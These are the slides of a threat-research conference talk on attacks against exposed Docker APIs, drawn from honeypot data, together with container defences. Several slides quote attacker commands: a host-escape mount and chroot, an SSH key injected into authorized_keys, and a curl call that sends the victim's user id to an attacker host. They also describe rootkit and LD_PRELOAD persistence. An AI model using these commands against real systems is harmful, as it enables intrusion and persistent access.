SlideShare ist ein Scribd-Unternehmen logo

ATT&CKING Containers in The Cloud

M
MITRE ATT&CK

From ATT&CKcon 3.0 By Jared Stroud, Lacework Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether this is Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610) , mine Cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques on how to defend their own container focused workloads.

Technologie
1 von 27
Downloaden Sie, um offline zu lesen
ATT&CKing Containers in The Cloud Jared Stroud (@DLL_Cool_J) © 2022, Lacework Inc. All Rights Reserved.
© 2022, Lacework Inc. All Rights Reserved. 2 ● Jared Stroud ● Currently: Cloud Security Researcher @ Lacework ● Former: MITRE Security Engineer ○ ATT&CK EVALS Carbanak/Fin7 ○ CALDERA ● Presented at: ○ SANS Blue Team Summit - Lightning Talk ○ DEFCON - Packet Hacking Village ○ Interpol DFEG ○ Shmoocon - Fire Talk ○ DFRWS - EU ○ BSides Roc $> whoami Lacework Labs is the dedicated research team at Lacework. We decided to build with a focus on areas that we believe are not getting enough attention in the research community specifically around new threats and attack surface risks within the public cloud. Like any good research team, we use a combination of data-driven intelligence creation and our own expertise in the key areas we focus on.
© 2022, Lacework Inc. All Rights Reserved. Agenda 3 The Shift to Container Workloads Honeypots Analyze The Data Container Focused Defenses
© 2022, Lacework Inc. All Rights Reserved. Shifting to Container Workloads ● Enterprise continues to adopt container workloads. ○ This “shift left” mentality provides business advantages to get products to end-users faster. ● Adversaries have noticed, and have targeted misconfigurations around the container ecosystem, including: ○ T1190 - Code repositories CI/CD pipelines ■ Ex: Gitlab ○ T1538 - Cloud Service Dashboards ○ T1552.007 - Exposed APIs for Containers. ● Lacework Labs has observed the introduction of “rogue images” into environments via: ○ T1610 - Deploying a container. ○ T1608 - Stage malicious container on Docker Hub. 4
© 2022, Lacework Inc. All Rights Reserved. Collecting Cloud Attack Data - Honeypots ● Honeypots ○ Emulate a service to a specific level of fidelity so an attacker throws an exploit/payload for collection. ● Consider the level of emulation fidelity you need. ○ Anecdotal example, having a simple netcat listener on port 9200 for Elasticsearch has caught the same payloads as Elasticsearch honeypots that actually do a level of service emulation. ○ Consider the adversary you’re looking to catch data from ■ Opportunistic vs Targeted 5
© 2022, Lacework Inc. All Rights Reserved. Building Whalehoney - A Docker Honeypot ● At the time of architecting our honeypot infrastructure, not many solutions existed for Docker that weren’t heavily tied to a particular database. ● Engineers at Lacework Labs developed a simple Python Flask based application to emulate the Docker API based on the available documentation on the Docker engine. 6
© 2022, Lacework Inc. All Rights Reserved. Quick Whalehoney Stats ● 244 unique payloads targeting the “api_container_create” endpoint ○ 24 payloads setting “privileged:true” ● 3 external SAAS services observed being used in attacks ● Docker Hub, Ngrok, Weaveworks’ Scope ○ Ngrok being leveraged in 146 payloads. 7
© 2022, Lacework Inc. All Rights Reserved. Typical Observed Execution Killchain 8
© 2022, Lacework Inc. All Rights Reserved. Deploy Container (T1610) & Escape to Host (T1611) ● Deploy container: achieved via exposed API ● Escape to Host: achieved via mounting host’s “/” to container’s “/mnt” and chrooting 9
T1611 - From Container → Host Pivot mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload
mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload T1059.004 - Post-compromise Payloads - Shell Script Dropper
mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload Post-compromise Payloads - Rootkits, Cryptominers, and ssh keys
© 2022, Lacework Inc. All Rights Reserved. Notable Execution of Initial Payload (cronb.sh) ● ~1500 line bash script (T1059.004) to deploy additional utilities including: ● Kill potential cryptocurrency miners on host. ● Deploys their own XMRig Cryptocurrency miner ● Observed TTPs: ○ Kills Alibaba (CloudMonitor/Aliyun) cloud monitoring agent (T1562.001) ○ Deploys SSH key for continued access (T1098.004) ○ Deploys .so’s for LD_PRELOAD attacks (T1574.006) ○ Deploys Diamorphine Rootkit for hiding access (T1014) ○ Naming ELF payloads to <file_name>.jpg when downloading (T1036) ● Deploying C2 Agent (ZiggyStartgux/Katien/Tsunami - IRC Bot) ● curl <attacker_controlled_ip>/idcheck/$(id) (obtain user id) 13
https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c Ghidra Pseudo C of Shared Objects grabbed by Docker bash script ● T1574.006 - Hijack Execution Flow: Dynamic Linker/Hijacking ○ Used for persistence/defense evasion ● Attack script wgets tar file of shared objects to be placed in /usr/local/lib and put in ld.so.preload. Notable Execution of Initial Payload (cronb.sh)
● Rootkit (T1014) Features include: ● When loaded, the module starts invisible. ● Hide/unhide any process by sending a signal 31. ● Sending a signal 63(to any pid) makes the module become (in)visible. ● Sending a signal 64(to any pid) makes the given user become root. ● Files or directories starting with the MAGIC_PREFIX become invisible. ● Diamorphine is built on the victim machine, and has the MAGIC_PREFIX unchanged. https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h diamorphine.h from attacker’s payload Defense Evasion/Persistence - Diamorphine Rootkit
echo ssh key to /root/.ssh/authorized_keys Exposed API Port (2375) Attacker’s payload ● cmd": ["sh", "-c", "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6 VAjM6i8AAUtpl15<snippet>' >> /opt/root/.ssh/authorized_keys] T1189 - Drive by Compromise (SSH Key Dropping)
… "cmd":["--probe.docker=true","--service-token=<REDACTED>"], "Image":"weaveworks/scope:1.13.2" …. T1133 - External Remote Services (Weaveworks Scope)
● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a staging ground. T1608 - Staging Capabilities (Docker Hub)
● Ngrok - legitimate utility for proxying local connections to public facing services (T1090). ○ Target users are developers that want to expose something locally on the internet. ○ Think of it as reverse ssh tunnels-as-a-service ● How adversaries abuse it: ○ Hosting payloads behind ngrok. ■ Free tier/paid tiers exist. ○ Avoids having to setup infrastructure beyond a VM. T1608 - Staging Capabilities (T1608) Ngrok
mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload Stopping The Compromise! Don’t expose the Docker Socket!
© 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Docker Content Trust (DCT) ● Leverage Docker Content Trust (DCT) to enforce digital signatures for runtime verification of images in your environment. ○ Prevent non-signed images from running. ○ Caveat, DCT is enabled/disabled via an environment variable. ● Docker Notary ○ Built around The Update Framework ● Does introduce additional management overhead of handling signing keys/revocations/etc… Reference: https://docs.docker.com/engine/security/trust/ 21
© 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Securing Kubernetes Deployments ● Prevent accidental exposure of management dashboards! ○ Including 3rd party integrations (Argo/Gitlab/etc…) ● Open Policy Agent (OPA) Enforcement! ○ Admission controller to prevent privileged pods or unnecessary capabilities being paired with deployments in given namespaces. ○ Ex: prevent CAP_SYS_ADMIN from being set on a deployment. ● Deploy Signed Containers ○ GCP’s GKE - Binary Authorization ■ Ensure deployed workloads have been signed. ○ AWS EKS Image signing is on their road map according to documentation ■ https://aws.github.io/aws-eks-best-practices/security/docs/image/ 22
© 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Exploring Runtime Protection Options ● Profile and limit syscalls you application makes! ○ Runtime syscall allow-listing via seccomp ● Can be tricky to tune, but greatly reduces surface in the event of an application compromise. Reference: https://www.lacework.com/blog/sand-honey-building-honeypots/ 23
© 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Honey Tokens in Cloud Native Environments ● What about non-opportunistic attackers? ○ Targeting resource specific services ○ Ex: Managed DBs, Container Registries, etc… ● Proactive Defenses via “honey tokens” around specific cloud native resources ○ Ex: Container Registry with beta-database-secrets- test Reference: https://www.lacework.com/blog/diy-canary-tokens-in-aws 24
Docker Honeypot - Whalehoney https://www.github.com/lacework-dev/whalehoney-PUBLIC Tool Release! Whalehoney, simple API emulation
© 2022, Lacework Inc. All Rights Reserved. 26 Recap Observed ATT&CKs T1610/T1611 - Deploy containers and escape to host. T1059.004 - Post-compromise payloads (Shell Script) T1562.001 - Impairing Defenses T1098.004 - Deploying ssh keys for persistence T1574.006/T10014 - LD_Preload/KOs for hijacking execution flow Defending In the Cloud Limit attack surface exposure (ingress/egress ACLs) Enforce signed container image deployments Implement Security Policies to API call Possibilities OPA for security policy enforcement of Kubernetes Proactive Defense via Honey Tokens
Thank you. IF YOU HAVE QUESTIONS, PLEASE GET IN TOUCH WITH laceworklabs@lacework.com © 2022, Lacework Inc. All Rights Reserved.

Empfohlen

Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
It's just a jump to the left (of boom): Prioritizing detection implementation...
It's just a jump to the left (of boom): Prioritizing detection implementation...It's just a jump to the left (of boom): Prioritizing detection implementation...
It's just a jump to the left (of boom): Prioritizing detection implementation...MITRE ATT&CK
 
ATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKMITRE ATT&CK
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSMITRE ATT&CK
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK PhilharmonicMITRE ATT&CK
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsMITRE ATT&CK
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamWhat is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
 

Empfohlen

Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
It's just a jump to the left (of boom): Prioritizing detection implementation...
It's just a jump to the left (of boom): Prioritizing detection implementation...It's just a jump to the left (of boom): Prioritizing detection implementation...
It's just a jump to the left (of boom): Prioritizing detection implementation...MITRE ATT&CK
 
ATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKMITRE ATT&CK
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSATT&CK Updates- ATT&CK for ICS
ATT&CK Updates- ATT&CK for ICSMITRE ATT&CK
 
The ATT&CK Philharmonic
The ATT&CK PhilharmonicThe ATT&CK Philharmonic
The ATT&CK PhilharmonicMITRE ATT&CK
 
ATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsATT&CK Updates- Campaigns
ATT&CK Updates- CampaignsMITRE ATT&CK
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamWhat is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
 
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro... Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...MITRE ATT&CK
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookMITRE ATT&CK
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorMITRE ATT&CK
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!MITRE ATT&CK
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developersMITRE ATT&CK
 
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKMITRE ATT&CK
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open SourceATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open SourceMITRE ATT&CK
 
Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/LinuxATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/LinuxMITRE ATT&CK
 
Projects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterProjects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterMITRE ATT&CK
 
Mapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMITRE ATT&CK
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchMITRE - ATT&CKcon
 
ATT&CKcon Intro
ATT&CKcon IntroATT&CKcon Intro
ATT&CKcon IntroMITRE ATT&CK
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CKMITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...MITRE ATT&CK
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE - ATT&CKcon
 
Top 5 benefits of docker
Top 5 benefits of dockerTop 5 benefits of docker
Top 5 benefits of dockerJohn Zaccone
 
A TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATIONA TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATIONInfluxData
 

Weitere ähnliche Inhalte

Was ist angesagt?

Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro... Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...MITRE ATT&CK
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookMITRE ATT&CK
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorMITRE ATT&CK
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!MITRE ATT&CK
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developersMITRE ATT&CK
 
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKMITRE ATT&CK
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open SourceATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open SourceMITRE ATT&CK
 
Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...MITRE ATT&CK
 
ATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/LinuxATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/LinuxMITRE ATT&CK
 
Projects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterProjects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterMITRE ATT&CK
 
Mapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMITRE ATT&CK
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchMITRE - ATT&CKcon
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CKMITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...MITRE ATT&CK
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE - ATT&CKcon
 

Was ist angesagt? (20)

Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro... Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
Intelligence Failures of Lincolns Top Spies: What CTI Analysts Can Learn Fro...
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections Collector
 
When Insiders ATT&CK!
When Insiders ATT&CK!When Insiders ATT&CK!
When Insiders ATT&CK!
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
Threat Modelling - It's not just for developers
Threat Modelling - It's not just for developersThreat Modelling - It's not just for developers
Threat Modelling - It's not just for developers
 
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CKATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
ATT&CK Metaverse - Exploring the Limitations of Applying ATT&CK
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
ATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open SourceATT&CK Updates- ATT&CK's Open Source
ATT&CK Updates- ATT&CK's Open Source
 
Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...Landing on Jupyter: The transformative power of data-driven storytelling for ...
Landing on Jupyter: The transformative power of data-driven storytelling for ...
 
ATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/LinuxATT&CK Updates- ATT&CK for mac/Linux
ATT&CK Updates- ATT&CK for mac/Linux
 
Projects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the CenterProjects to Impact- Operationalizing Work from the Center
Projects to Impact- Operationalizing Work from the Center
 
Mapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE ActivitiesMapping ATT&CK Techniques to ENGAGE Activities
Mapping ATT&CK Techniques to ENGAGE Activities
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
 
ATT&CKcon Intro
ATT&CKcon IntroATT&CKcon Intro
ATT&CKcon Intro
 
State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CK
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
 

Ähnlich wie ATT&CKING Containers in The Cloud

Top 5 benefits of docker
Top 5 benefits of dockerTop 5 benefits of docker
Top 5 benefits of dockerJohn Zaccone
 
A TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATIONA TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATIONInfluxData
 
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17Muga Nishizawa
 
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?ArangoDB Database
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMMark Secretario
 
IAU workshop 2018 day one
IAU workshop 2018 day oneIAU workshop 2018 day one
IAU workshop 2018 day oneWalid Shaari
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldDevOps.com
 
Swarm: Native Docker Clustering
Swarm: Native Docker ClusteringSwarm: Native Docker Clustering
Swarm: Native Docker ClusteringRoyee Tager
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Daniel Oh
 
The internals and the latest trends of container runtimes
The internals and the latest trends of container runtimesThe internals and the latest trends of container runtimes
The internals and the latest trends of container runtimesAkihiro Suda
 
KubeCon 2022 EU Flux Security.pdf
KubeCon 2022 EU Flux Security.pdfKubeCon 2022 EU Flux Security.pdf
KubeCon 2022 EU Flux Security.pdfWeaveworks
 
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...Oleg Shalygin
 
Introduction to Docker and Monitoring with InfluxData
Introduction to Docker and Monitoring with InfluxDataIntroduction to Docker and Monitoring with InfluxData
Introduction to Docker and Monitoring with InfluxDataInfluxData
 
Making Service Deployments to AWS a breeze with Nova
Making Service Deployments to AWS a breeze with NovaMaking Service Deployments to AWS a breeze with Nova
Making Service Deployments to AWS a breeze with NovaGregor Heine
 
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldHere Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldC4Media
 
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...Ambassador Labs
 
GitOps (& Flux) for Helm Users with Scott Rigby
